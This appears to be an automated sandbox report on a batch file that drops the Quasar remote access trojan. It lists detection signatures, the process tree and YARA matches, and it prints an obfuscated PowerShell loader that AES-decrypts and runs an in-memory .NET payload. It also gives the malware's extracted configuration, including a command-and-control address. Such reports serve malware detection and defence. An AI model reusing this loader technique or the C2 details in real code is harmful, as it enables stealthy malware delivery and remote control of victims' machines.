Windows
Analysis Report
deneme.bat
Overview
General Information
Detection
Quasar
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected Quasar RAT
Renames powershell.exe to bypass HIPS
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- cmd.exe (PID: 2948, cmdline: `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "`, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4652, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- mode.com (PID: 5932, cmdline: `Mode 60,3`, MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
- certutil.exe (PID: 6972, cmdline: `CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"`, MD5: EB199893441CED4BBBCB547FE411CF2D)
- allah.bat.exe (PID: 6956, cmdline: `"allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]]('')))`, MD5: 95000560239032BC68B4C2FDFCDEF913)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Quasar RAT, QuasarRAT | Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. | | | |
{"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "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"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth (Nextron Systems) | |
| | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
| | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen | |
| | MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen | |
No Sigma rule has matched
No Snort rule has matched
AV Detection |
---|
Source: | Malware Configuration Extractor: |